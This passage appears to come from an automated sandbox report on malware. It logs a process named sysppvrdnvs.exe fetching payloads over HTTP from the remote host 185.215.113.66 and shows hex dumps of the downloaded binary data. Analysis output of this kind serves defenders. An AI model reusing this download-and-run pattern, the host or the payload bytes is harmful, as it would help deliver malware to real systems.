                                                                                                                                                                                            Data Raw: aa ff 5b 85 19 de 79 93 4d ba ae a5 78 a9 fd 33 2b 5f 5b 98 2f e2 90 9b 43 bd 1a 0d 04 b2 f0 0d e0 d2 4c b9 c7 49 cc d7 d9 86 fc 8a cb a9 8a a3 e8 4b 30 70 cc 50 61 19 a3 47 82 6a 87 71 cd 8c 0c 72 ae da 3e dd b2 2b 22 4d d7 28 a6 af 1c bc 29 de 1c 02 e5 f1 a6 6e 66 9e dd 18 a8 da 2b ff 6d c4 8d ee fd 38 60 ba e4 86 f4 d7 40 df 27 56 a7 f2 ca 5d 5f fa 84 aa 7b cf 31 80 26 84 f3 f2 df d5 e9 24 ed 82 c6 22 c1 fd cf 14 bb 4c 2b d9 27 6c f4 35 00 10 82 a6 1e bb 1d cf 5d 31 5a dd 21 48 df 7c c6 bd aa 01 4a af 21 b4 2f b4 3d 3a 6a 72 7e ad 32 ca d0 54 ff fa 5e 52 a6 ae 21 74 90 74 88 9f 33 25 5f 1c 2f 3a cd 70 f4 a3 40 f4 de 5a 2d 2e a5 ab 8c c7 c4 39 ee ac 1f df dd ad 83 61 53 40 96 ef 54 f8 d5 99 78 d0 5c 15 a6 e4 3a 94 aa 88 b5 29 9f 27 fe df f6 f1 44 8d bc dd e1 03 41 86 b3 e3 55 74 f6 93 e0 52 2d 67 f4 5a 3e ac f1 42 1d 05 88 0b c7 71 98 35 3a 39 b0 14 2a a2 79 0b 6e 7a ab 34 d0 5e f3 c0 be 79 a1 6e 92 b2 77 e0 36 5f b2 e6 fd 89 91 4d 37 1c 32 b3 ee 70 af 6a 4a 74 8a 23 65 0e 7a c7 53 57 d8 80 68 b7 [TRUNCATED]
                                                                                                                                                                                            Data Ascii: [yMx3+_[/CLIK0pPaGjqr>+"M()nf+m8`@'V]_{1&$"L+'l5]1Z!H|J!/=:jr~2T^R!tt3%_/:p@Z-.9aS@Tx\:)'DAUtR-gZ>Bq5:9*ynz4^ynw6_M72pjJt#ezSWh4{q/br( olSu5nw;i#:X<<T>cRfzgzDG:]]G=su`#Zt9Xw48~$YJ<0}~,4SJGJwzbyt;9C#<$v@0`/"8bn,]E-VpYcGa:q2oWO,N3#@my1~-I-.!m<fa^ak=FzeMq/(\R\)KwxlM7LD G+m\E~Xt:|2EX<\P3,qDxRG,~TaZ~v{zJ[a$y#gR<v\>cjn)?kSxP07@Pe@ZL6RvoexXOK4For'A8K%?RtGVB}c7!8=f&d
                                                                                                                                                                                            Oct 26, 2024 07:26:53.054727077 CEST112INData Raw: 49 24 02 da 57 17 86 62 ea 4f b3 98 a8 06 64 68 e4 0e 11 0e 16 b4 f3 7d b0 7f 4e f3 b6 bb c5 b4 04 d0 bf 65 7f 95 6e fe ce e4 7b b2 ca f9 ec 06 09 b6 58 0e 05 a0 aa 0b 83 ec 25 fb e4 1d e9 c0 9d 1e 4d 8c be fd 63 31 5e 38 76 9c 34 c9 48 ba b1 12
                                                                                                                                                                                            Data Ascii: I$WbOdh}Nen{X%Mc1^8v4H|f|'x


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            5192.168.2.649914185.215.113.66801588C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Oct 26, 2024 07:26:54.088952065 CEST166OUTGET /3 HTTP/1.1
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                            Host: 185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:26:54.995249987 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                            Date: Sat, 26 Oct 2024 05:26:54 GMT
                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                            Content-Length: 16128
                                                                                                                                                                                            Last-Modified: Wed, 25 Sep 2024 06:10:59 GMT
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            ETag: "66f3a973-3f00"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Data Raw: aa ff 5b 85 19 de 79 93 4d ba ae a5 78 a9 fd 33 2b 5f 5b 98 2f e2 90 9b 43 bd 1a 0d 04 b2 f0 0d e0 d2 4c b9 c7 49 cc d7 d9 86 fc 8a cb a9 8a a3 e8 4b 30 70 cc 50 61 19 a3 47 82 6a 87 71 cd 8c 0c 72 ae da 3e dd b2 2b 22 4d d7 28 a6 af 1c bc 29 de 1c 02 e5 f1 a6 6e 66 9e dd 18 a8 da 2b ff 6d c4 8d ee fd 38 60 ba e4 86 f4 d7 40 df 27 56 a7 f2 ca 5d 5f fa 84 aa 7b cf 31 80 26 84 f3 f2 df d5 e9 24 ed 82 c6 22 c1 fd cf 14 bb 4c 2b d9 27 6c f4 35 00 10 82 a6 1e bb 1d cf 5d 31 5a dd 21 48 df 7c c6 bd aa 01 4a af 21 b4 2f b4 3d 3a 6a 72 7e ad 32 ca d0 54 ff fa 5e 52 a6 ae 21 74 90 74 88 9f 33 25 5f 1c 2f 3a cd 70 f4 a3 40 f4 de 5a 2d 2e a5 ab 8c c7 c4 39 ee ac 1f df dd ad 83 61 53 40 96 ef 54 f8 d5 99 78 d0 5c 15 a6 e4 3a 94 aa 88 b5 29 9f 27 fe df f6 f1 44 8d bc dd e1 03 41 86 b3 e3 55 74 f6 93 e0 52 2d 67 f4 5a 3e ac f1 42 1d 05 88 0b c7 71 98 35 3a 39 b0 14 2a a2 79 0b 6e 7a ab 34 d0 5e f3 c0 be 79 a1 6e 92 b2 77 e0 36 5f b2 e6 fd 89 91 4d 37 1c 32 b3 ee 70 af 6a 4a 74 8a 23 65 0e 7a c7 53 57 d8 80 68 b7 [TRUNCATED]
                                                                                                                                                                                            Data Ascii: [yMx3+_[/CLIK0pPaGjqr>+"M()nf+m8`@'V]_{1&$"L+'l5]1Z!H|J!/=:jr~2T^R!tt3%_/:p@Z-.9aS@Tx\:)'DAUtR-gZ>Bq5:9*ynz4^ynw6_M72pjJt#ezSWh4{q/br( olSu5nw;i#:X<<T>cRfzgzDG:]]G=su`#Zt9Xw48~$YJ<0}~,4SJGJwzbyt;9C#<$v@0`/"8bn,]E-VpYcGa:q2oWO,N3#@my1~-I-.!m<fa^ak=FzeMq/(\R\)KwxlM7LD G+m\E~Xt:|2EX<\P3,qDxRG,~TaZ~v{zJ[a$y#gR<v\>cjn)?kSxP07@Pe@ZL6RvoexXOK4For'A8K%?RtGVB}c7!8=f&d
                                                                                                                                                                                            Oct 26, 2024 07:26:54.995306015 CEST112INData Raw: 49 24 02 da 57 17 86 62 ea 4f b3 98 a8 06 64 68 e4 0e 11 0e 16 b4 f3 7d b0 7f 4e f3 b6 bb c5 b4 04 d0 bf 65 7f 95 6e fe ce e4 7b b2 ca f9 ec 06 09 b6 58 0e 05 a0 aa 0b 83 ec 25 fb e4 1d e9 c0 9d 1e 4d 8c be fd 63 31 5e 38 76 9c 34 c9 48 ba b1 12
                                                                                                                                                                                            Data Ascii: I$WbOdh}Nen{X%Mc1^8v4H|f|'x
                                                                                                                                                                                            Oct 26, 2024 07:26:54.995323896 CEST1236INData Raw: e7 fb dd bb ba 5c 82 d9 10 01 16 0b d1 18 bc a5 c1 52 27 e6 01 29 e5 a1 94 eb 5a d4 9c d9 0e c6 b9 08 0f 7b d1 dc 97 ca 03 fd 8d 9b 69 02 43 7f bb 2c 1c 7d 27 9e f3 1f 9e 05 68 84 fa 43 bc b1 ac 68 af c3 ad 35 ee 5b d6 9c 1a 77 52 47 90 d7 8d 40
                                                                                                                                                                                            Data Ascii: \R')Z{iC,}'hCh5[wRG@XB;G[-iC+(?E=y[$He&qs*ukH7<IzH6=Azqk]9hlg:k.vK4"N[e:M;2/KUNMlRA8Wh!&J|-^=_4g
                                                                                                                                                                                            Oct 26, 2024 07:26:54.995345116 CEST1236INData Raw: b1 75 f1 15 cb 86 00 f9 d2 09 b9 72 00 86 b3 62 b8 79 f4 fb 15 63 27 e6 0f f3 9d cc 58 84 67 d0 2a 79 38 b5 38 8b 83 a3 b9 28 be b7 42 41 f1 e2 6f 71 f2 62 ff 1e ca cc 92 cb 5c 33 6d 63 32 ac e4 6b dc 87 0a 85 d5 67 26 93 df 3b 10 52 0d ea 61 b6
                                                                                                                                                                                            Data Ascii: urbyc'Xg*y88(BAoqb\3mc2kg&;Rao#``2C(BRcAEy3.(d{A#/h>(HyN}X2m+@0'+gU2OduQa17j(rEw3<&tLi)DVo|
                                                                                                                                                                                            Oct 26, 2024 07:26:54.995364904 CEST1236INData Raw: d8 09 89 b1 d7 c1 86 84 f9 13 dc c1 36 ee be 66 f7 71 8d 09 90 88 b0 96 8c 7b 3e 17 51 9c 15 e7 41 82 42 c7 31 54 d7 5b 14 eb b7 f3 c8 13 87 aa bd 7e 33 9e 23 c8 56 c6 ce a6 ea 50 76 b9 e3 96 b0 7c c2 6c 0b a6 f7 46 94 8d 3b 1a 07 d9 08 79 88 cc
                                                                                                                                                                                            Data Ascii: 6fq{>QAB1T[~3#VPv|lF;yHu^-z|&#BzHrsexJJe"xg+b-&x[m,Vb/WUEetS~F/xhfo&Y.=yU9hwaL{%+
                                                                                                                                                                                            Oct 26, 2024 07:26:54.995377064 CEST1236INData Raw: 19 02 a2 14 1c 5c f8 33 91 43 05 0f 10 5b 36 4e 33 6e 72 e4 a5 c4 64 ad c7 23 59 66 34 55 86 66 04 97 82 11 f7 a5 ef dc c3 9e 51 80 22 5e 2c 60 02 3a 66 b3 ee 3d eb 6b 9b 1d e3 46 9e e8 27 e7 0b 4f 88 47 d9 2e c3 cd 9e 75 a9 d3 cb 32 87 7e 6f df
                                                                                                                                                                                            Data Ascii: \3C[6N3nrd#Yf4UfQ"^,`:f=kF'OG.u2~o8?_s}T^_+=y?PtVOD/mpDVQ*jj&!-6Ma:|G@`Rw<,ywV#eeEVBAH/^Cpo#=S-s
                                                                                                                                                                                            Oct 26, 2024 07:26:54.995388985 CEST1236INData Raw: b3 8a 6d 78 63 1f c4 c8 ca 3a eb 3b cd 3e 62 0d 72 9a 27 de 43 39 78 9c ea d8 99 7e 04 d5 2e a0 80 11 ec 2e ac 36 4f 9a 76 d3 98 1b 86 d0 ab 61 d0 01 a6 bd 2c 49 78 d2 d5 cb 25 be 51 b0 e6 81 4c f4 b0 a8 1c 36 9d d5 0c 28 48 fd 81 2d 6f 05 fc a1
                                                                                                                                                                                            Data Ascii: mxc:;>br'C9x~..6Ova,Ix%QL6(H-oeq@.>SX~^x~QKCmJr1FhW)U`aQfN3Dh4O,2WMtQ|kBE=L~] ;jZG#Ad^7p7:Elc
                                                                                                                                                                                            Oct 26, 2024 07:26:54.995399952 CEST560INData Raw: 24 d3 59 e5 1c a8 d5 57 ee 8f 8a ce aa fe e0 a5 e1 7c ec 78 14 05 4c 0b fc 7d 59 5a 4f 0a 0a 45 fb 59 40 65 b7 09 10 12 46 aa 1d f5 0a 68 b4 50 ae de 46 80 b0 01 a4 7e 31 b4 ae 4a bf c3 47 40 19 0b cb a9 79 65 34 e0 23 ea ad f0 6d 19 35 f8 c7 59
                                                                                                                                                                                            Data Ascii: $YW|xL}YZOEY@eFhPF~1JG@ye4#m5YE8mA!pV7>S?5XK=`:btHho/I-6JM5[c}0'z 8g'?Q<Py*P-DH_gb9LKb
                                                                                                                                                                                            Oct 26, 2024 07:26:54.995426893 CEST1236INData Raw: 61 a2 39 0e a5 75 4e 7f 43 be 9a 7a 42 19 5c 44 23 8e a7 f1 c7 b4 ef f4 34 f5 ea c0 c6 9d 42 a1 be 25 35 5d 91 b7 2f fb 57 de c0 c2 43 8e 9d ba c5 c2 de 56 be bf 89 06 97 08 15 4e 05 2a 0e a5 7f 1b 0d d3 98 e8 7e 43 0f 5c 8f e8 46 f7 3d 50 9e 30
                                                                                                                                                                                            Data Ascii: a9uNCzB\D#4B%5]/WCVN*~C\F=P0^(IZ=\9cD&eY>3_q;DlS(m=WUg[Sj%Ko7v!M\oD]*c'q7tQnE=jv^YqjkTqHj<TM]VF~8nhCJ
                                                                                                                                                                                            Oct 26, 2024 07:26:54.995446920 CEST1236INData Raw: 09 0d 48 a1 f8 16 b9 9b 26 06 0c 71 c1 02 4a 14 24 ab e2 0d e0 93 9d 59 04 93 11 63 22 2f 70 d1 c9 0c b1 7e 61 54 9f c5 a6 6c a0 92 75 29 01 02 e5 7f 98 4b d7 94 db 6a 1f c3 be 93 e3 ff c0 cb 7a 36 a6 06 4a e1 9f 79 7a 5d da 78 b2 95 fb 3d 9e a5
                                                                                                                                                                                            Data Ascii: H&qJ$Yc"/p~aTlu)Kjz6Jyz]x=$s^!}_m+ck@L.<4^f wtEpr)o}nEL-MC*kK<[fw^jBYio1JvHwaJ+G-
                                                                                                                                                                                            Oct 26, 2024 07:26:55.000848055 CEST1236INData Raw: 55 52 74 b5 1b 28 36 ee f8 74 c2 d2 9d 56 5e dc 6a ec 28 2a a9 e5 8a f1 39 85 01 d8 09 10 40 9e e8 9a ab cc 39 7e 76 23 69 2f 4f df bc 42 04 2b b2 88 62 72 b7 bb be 62 94 10 72 be 8d 4f 34 e0 fb 8a 4e ff 1e 04 7a 1c 49 42 4a b1 a9 b1 f9 71 23 f2
                                                                                                                                                                                            Data Ascii: URt(6tV^j(*9@9~v#i/OB+brbrO4NzIBJq#LE2&xPV7vg?6K0v'p}%6GD+D%HTD$PioV><x6>S@Kv*Jj`-y-'#[jMF,aYk@hh
                                                                                                                                                                                            Oct 26, 2024 07:27:01.251027107 CEST166OUTGET /4 HTTP/1.1
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                            Host: 185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:01.530986071 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                            Date: Sat, 26 Oct 2024 05:27:01 GMT
                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                            Content-Length: 10496
                                                                                                                                                                                            Last-Modified: Sun, 20 Oct 2024 18:34:00 GMT
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            ETag: "67154d18-2900"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Data Raw: 13 e3 aa 7c f1 40 76 43 29 84 09 02 71 ae 39 fc df 9d fa 02 4b d8 7b 3e ae 0c e2 64 38 f9 d3 27 da 73 10 d1 ca f9 f2 4a f8 ad aa 12 e8 fa c9 50 6e f5 a1 6b 88 56 c2 7a 1f 17 e8 40 57 00 b2 8f df 4c 7b e3 14 75 47 bf 27 47 31 bb 43 4c 8e e7 b4 40 14 db 1d 3c 42 cc e1 36 dc d3 3b 91 3e 68 4d 15 e2 5c e6 98 da 7c 77 03 42 8c 76 ca a5 9a 81 db a1 ec 75 f2 84 a2 67 09 f0 c5 b4 4f 58 86 25 fc 20 b3 68 fa 72 39 3a 7c e0 1b f5 e8 b0 73 b6 f8 3c 81 36 fa 29 81 67 e8 ee 34 47 6c 59 b9 7f 18 32 42 66 14 35 b3 8d e2 41 8d e5 92 2b 47 1f c0 93 b3 28 d8 54 2d 6f 45 f1 c3 5a cf 49 32 33 d3 7b ac a8 27 33 c1 c9 e0 29 60 f9 b3 d3 5e 65 37 6a 7a 2f 4d 24 73 1b 93 bb fa 91 d2 34 ce 9b 19 db d6 2a 31 36 f0 a2 ab 92 6d 08 d9 66 72 6e 07 c5 44 44 2c 9e af ae ce d3 fb 57 61 28 cd 32 90 44 0e c3 39 95 a9 ab 17 e4 0d 16 a5 f0 c2 e3 78 c3 de e1 fa ff 86 d7 ae ab 06 ba 5a 6b 34 44 61 15 d3 b1 85 29 3f 83 f4 5f 68 10 ed 8d d7 73 41 11 b6 57 f3 ed 02 fa a4 42 32 ff 99 d6 ea 0a 63 48 51 ba 54 b5 00 01 83 3d 9e bb 55 dd 93 1c e5 [TRUNCATED]
                                                                                                                                                                                            Data Ascii: |@vC)q9K{>d8'sJPnkVz@WL{uG'G1CL@<B6;>hM\|wBvugOX% hr9:|s<6)g4GlY2Bf5A+G(T-oEZI23{'3)`^e7jz/M$s4*16mfrnDD,Wa(2D9xZk4Da)?_hsAWB2cHQT=U@3}!YGCX{ 4"&h0.'xu#c|gL0)cM]oL{:En:?|_XPQ@ 3.o)ua[I+fZM% ]2uz_Gwt0bFaMTd2Y&TMXP}+OpQEo6R;P>8`2'"~CZ_,2g $l"x:h;H`$-6_-eC?6T=qL3&fG)WG@6X~%X%RCh?R].fbU!PHh"Rj,dk.e\~hn(,G<u16tlw;p;yrSC_M6XhtG7zsHP,e_ddcn^M+ct\0jr>;_nq>xezw


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            6192.168.2.649957185.215.113.66801588C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Oct 26, 2024 07:27:02.641123056 CEST166OUTGET /4 HTTP/1.1
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                            Host: 185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:03.546670914 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                            Date: Sat, 26 Oct 2024 05:27:03 GMT
                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                            Content-Length: 10496
                                                                                                                                                                                            Last-Modified: Sun, 20 Oct 2024 18:34:00 GMT
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            ETag: "67154d18-2900"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Data Raw: 13 e3 aa 7c f1 40 76 43 29 84 09 02 71 ae 39 fc df 9d fa 02 4b d8 7b 3e ae 0c e2 64 38 f9 d3 27 da 73 10 d1 ca f9 f2 4a f8 ad aa 12 e8 fa c9 50 6e f5 a1 6b 88 56 c2 7a 1f 17 e8 40 57 00 b2 8f df 4c 7b e3 14 75 47 bf 27 47 31 bb 43 4c 8e e7 b4 40 14 db 1d 3c 42 cc e1 36 dc d3 3b 91 3e 68 4d 15 e2 5c e6 98 da 7c 77 03 42 8c 76 ca a5 9a 81 db a1 ec 75 f2 84 a2 67 09 f0 c5 b4 4f 58 86 25 fc 20 b3 68 fa 72 39 3a 7c e0 1b f5 e8 b0 73 b6 f8 3c 81 36 fa 29 81 67 e8 ee 34 47 6c 59 b9 7f 18 32 42 66 14 35 b3 8d e2 41 8d e5 92 2b 47 1f c0 93 b3 28 d8 54 2d 6f 45 f1 c3 5a cf 49 32 33 d3 7b ac a8 27 33 c1 c9 e0 29 60 f9 b3 d3 5e 65 37 6a 7a 2f 4d 24 73 1b 93 bb fa 91 d2 34 ce 9b 19 db d6 2a 31 36 f0 a2 ab 92 6d 08 d9 66 72 6e 07 c5 44 44 2c 9e af ae ce d3 fb 57 61 28 cd 32 90 44 0e c3 39 95 a9 ab 17 e4 0d 16 a5 f0 c2 e3 78 c3 de e1 fa ff 86 d7 ae ab 06 ba 5a 6b 34 44 61 15 d3 b1 85 29 3f 83 f4 5f 68 10 ed 8d d7 73 41 11 b6 57 f3 ed 02 fa a4 42 32 ff 99 d6 ea 0a 63 48 51 ba 54 b5 00 01 83 3d 9e bb 55 dd 93 1c e5 [TRUNCATED]
                                                                                                                                                                                            Data Ascii: |@vC)q9K{>d8'sJPnkVz@WL{uG'G1CL@<B6;>hM\|wBvugOX% hr9:|s<6)g4GlY2Bf5A+G(T-oEZI23{'3)`^e7jz/M$s4*16mfrnDD,Wa(2D9xZk4Da)?_hsAWB2cHQT=U@3}!YGCX{ 4"&h0.'xu#c|gL0)cM]oL{:En:?|_XPQ@ 3.o)ua[I+fZM% ]2uz_Gwt0bFaMTd2Y&TMXP}+OpQEo6R;P>8`2'"~CZ_,2g $l"x:h;H`$-6_-eC?6T=qL3&fG)WG@6X~%X%RCh?R].fbU!PHh"Rj,dk.e\~hn(,G<u16tlw;p;yrSC_M6XhtG7zsHP,e_ddcn^M+ct\0jr>;_nq>xezw
                                                                                                                                                                                            Oct 26, 2024 07:27:03.546689034 CEST1236INData Raw: b6 6f 0a 0a 83 25 6b 6b 77 fa e4 46 67 eb d9 41 2f aa 63 53 82 83 51 d9 2f 3d 63 6a 82 33 0b 6f 95 13 e1 9f 36 1b ba cb fb f5 6f 57 bb 40 bd 1d a5 c1 57 98 12 18 b1 98 2c ff 21 39 d5 d8 8c 8b 48 74 d5 8a 79 fc c5 75 bb aa e4 d3 c1 a0 97 29 d7 96
                                                                                                                                                                                            Data Ascii: o%kkwFgA/cSQ/=cj3o6oW@W,!9Htyu)PU:vO'8O>*B aw'&iEpRaMZ|3Fk<lQ;GbPMlh5}8m;ajW,N7&QK
                                                                                                                                                                                            Oct 26, 2024 07:27:03.546700001 CEST1236INData Raw: 63 34 74 b5 c2 9f e6 cf 24 40 6d 6d 39 94 34 21 a1 59 32 49 93 8d 45 6f 16 41 e3 3e fb e9 ec 01 f9 89 40 75 7d 84 c1 29 99 2e 8f f9 01 1b d7 e2 f5 ea f5 37 7e 95 c0 87 7f d4 e2 e3 b8 2c a3 95 7b 43 15 a1 69 fe 92 c8 13 e2 7f 5f 3b 68 4b fa 25 e1
                                                                                                                                                                                            Data Ascii: c4t$@mm94!Y2IEoA>@u}).7~,{Ci_;hK%D&kuY'p=/a:NTtKu"1X[8Ibdym-*|+>a`<Z!%| 4&[+usL^etpuu);Xb<>M\
                                                                                                                                                                                            Oct 26, 2024 07:27:03.546739101 CEST1236INData Raw: 0b a6 7d 79 c6 0e 19 41 de 44 a9 03 74 f2 fb a9 92 bc 27 b6 69 9d 42 1a 59 26 6e 6d a8 df 05 cd 7b e6 9c e9 45 0f 67 74 bc 1a e1 59 dd 58 26 67 a8 cb ea 52 87 27 f1 9b fe 95 bd 52 bf 68 3a 2f 74 d5 bc 82 48 3c f6 ef 52 41 bf 9a 2d b2 e4 48 3f 02
                                                                                                                                                                                            Data Ascii: }yADt'iBY&nm{EgtYX&gR'Rh:/tH<RA-H?:3a$8;SU*rN1QIuc>"W|1Rrm]T1&PSTQZqEtgc[U*,@+LoR0rMwfu^VUzcie_$eM;B
                                                                                                                                                                                            Oct 26, 2024 07:27:03.546749115 CEST1236INData Raw: 0e 0b 73 b4 cc 61 72 90 49 03 c9 0c 34 6e 73 ed 3b 3f 45 e7 2a 84 8c 3b 11 6d 21 89 00 60 23 47 8c c2 4b 9e c0 2c d8 47 80 38 fd e5 6a f8 e1 31 10 55 0b 54 d4 89 df 1b da 0d 24 5b 6e ee 18 45 4b 11 59 49 7e 62 cf 22 93 99 ab 6f bd b6 fe 39 0b 36
                                                                                                                                                                                            Data Ascii: sarI4ns;?E*;m!`#GK,G8j1UT$[nEKYI~b"o96{'#S(cJK4*Hft5U>1uauV|p8"`;uT;_Ibmppc&D5HCwjrH&532a`#&A
                                                                                                                                                                                            Oct 26, 2024 07:27:03.546770096 CEST1236INData Raw: 52 57 11 8b 24 3e 89 1b 44 e8 11 27 36 d3 98 6c 64 5f c1 5e 36 d1 aa 50 5a 3a 84 e5 9f 20 97 64 a4 c0 4b 41 9b fa 0a f4 83 09 e0 69 91 cf e7 2c d4 09 d5 e4 18 60 53 3c 4e cb 83 5e 89 f8 2f 97 1b db be 93 32 73 f7 8d f7 65 6f 24 ee f6 74 d5 08 d2
                                                                                                                                                                                            Data Ascii: RW$>D'6ld_^6PZ: dKAi,`S<N^/2seo$tRu@.\]=/E,PX<yu6CIEF`!Ue$u9r;SwjF"dDxsWY/"4|bob`|bS
                                                                                                                                                                                            Oct 26, 2024 07:27:03.546787977 CEST1236INData Raw: b5 f2 e5 56 94 d5 a7 ba 2e 4b ef 19 cb 34 b8 a7 99 e1 80 8c cc c0 91 a1 56 e3 29 95 04 e6 0f b9 a5 86 93 81 fe fb 19 09 f6 66 dc 6a 30 a9 58 e4 78 2d 5f 4e 45 b3 14 af 02 96 da 20 60 39 3e 4b 48 c0 80 cb 76 02 0b 8c c1 87 09 1a bc 98 6d 65 18 af
                                                                                                                                                                                            Data Ascii: V.K4V)fj0Xx-_NE `9>KHvme#R]/I{J4],GCrJZ3;:U$=%W&^/UR1i [kkRh1;Cz^DO"j$qQT`r!Q[(7_`E
                                                                                                                                                                                            Oct 26, 2024 07:27:03.546799898 CEST1236INData Raw: 28 11 af e2 41 9b fa 51 e9 ab d8 2a 79 da ce 15 40 37 b8 70 18 de 0f 5b 95 e6 1e b5 38 1d 61 99 66 96 eb c4 00 1f 65 72 58 fc 2e 42 79 8e 29 b8 e0 15 7b 9e 33 1a 0b 8c e5 49 8f 3e 92 cc 6d 67 59 91 10 68 27 3e 93 f3 d5 fa 1d e9 90 99 e6 46 67 f1
                                                                                                                                                                                            Data Ascii: (AQ*y@7p[8aferX.By){3I>mgYh'>Fg),},([vUl s?u/AsGbrRbV1oLE?fpK`|cv\}0>jmer^kvrM5uMW~c3FzWSkUM@q
                                                                                                                                                                                            Oct 26, 2024 07:27:03.546812057 CEST873INData Raw: b7 1b ed 55 22 52 87 a3 c5 38 9f b8 98 95 ff b4 f2 c4 e9 dd 2d 0b 3c 5d 3d 5e 30 5e fd c6 f8 54 b4 2a e8 93 3d a8 1f 7d 5c e5 4d 1d c9 7e cb 06 5c 4c 2c 00 33 bd 10 e0 11 48 3b 01 7b 52 15 1a d2 67 2c a4 26 fc e8 3f 86 7e 08 4f 27 64 b0 a6 1b 25
                                                                                                                                                                                            Data Ascii: U"R8-<]=^0^T*=}\M~\L,3H;{Rg,&?~O'd%`dJU]~Y:|2Jd-\ Q@n\|{hYc$P;.s^X"@Nn>$2Y+J@Y},?r`41RmU\gd
                                                                                                                                                                                            Oct 26, 2024 07:27:09.641675949 CEST166OUTGET /5 HTTP/1.1
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                            Host: 185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:09.917036057 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                            Date: Sat, 26 Oct 2024 05:27:09 GMT
                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                            Content-Length: 13568
                                                                                                                                                                                            Last-Modified: Tue, 22 Oct 2024 12:10:16 GMT
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            ETag: "67179628-3500"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Data Raw: 0c 11 18 17 3d 7f 82 02 a6 24 36 4b 11 62 4d 55 d2 81 18 a8 7b ac b4 99 13 ea 95 14 cc 97 97 e2 0a 71 67 8a f6 90 c5 ca 7a 7b 56 bb fa e8 89 09 55 1a 05 57 8f 9c 1a 81 d8 bb 44 82 88 57 06 b0 a8 b1 0d 7d 50 5d 73 d2 54 4b d9 0b b0 cd a7 15 33 5a 57 25 7a d1 92 b0 cc 68 22 98 ff fd 1b 98 b0 f5 65 52 62 23 6d 48 84 63 2c a5 ce 1c d7 7e 20 81 7c 51 12 ee 07 70 82 1e bb bd 5b c1 57 cc 9f 3b 07 de 21 89 69 22 52 a2 b3 ac 41 42 e4 9f 74 46 e4 c5 ff 6a 73 b7 e0 c8 5f 4b 1f cc 28 e3 35 c9 6a 94 90 c9 95 c3 85 52 2c ae 57 13 b6 c7 b3 65 41 44 cb 6e cf 7e 5a 38 88 3a 70 d6 16 06 5e 35 43 a9 4c 56 d1 91 19 cf 12 60 0e f4 0e 93 ce ed f1 59 ab 0f ac b8 08 db 75 8f 57 bd 3e 74 90 a5 b5 79 a1 e7 5c 27 4a 05 b2 04 bb fc f0 de 98 12 16 00 a4 94 30 c4 34 a7 3f 3d d1 48 9d 54 69 63 38 91 b3 31 0e e5 1c 1b 3b 56 e3 53 a0 7c af cd 1f e8 b5 94 ca 54 f5 68 9c e2 81 d7 79 54 fc 2b 6d ba e7 01 91 17 71 86 42 4c 6b dd ff 4f a6 b4 df 21 b1 1d aa 7b 15 e2 4c ad c1 62 52 91 b1 1e ba e8 86 3c 96 57 ad 50 ef 4f 07 df 8e c3 28 72 [TRUNCATED]
                                                                                                                                                                                            Data Ascii: =$6KbMU{qgz{VUWDW}P]sTK3ZW%zh"eRb#mHc,~ |Qp[W;!i"RABtFjs_K(5jR,WeADn~Z8:p^5CLV`YuW>ty\'J04?=HTic81;VS|ThyT+mqBLkO!{LbR<WPO(rVc=Tb''+DZE"rJ:h}nw1~z:/;fwH`^D|%F8MD)A_uhi\:h%~!a>&cbV)g$V]Bg1v@%<+({Ps?'f#[V>%}sKu~gWA09-#98wSKfvZgi<)X>rRj9[t6'G*\3+veYh_9^H-'BIh=M8Nz-nt>+yJMpWPLkPyW"y~&ecMz6sC!J`mS?2"OR]N xcxkit9f#:a#C"Ql0p{{rtE:r:'lL]!poXAdOq'Fa|yM{x;!++H.}bpp8h;qLLa<x<j
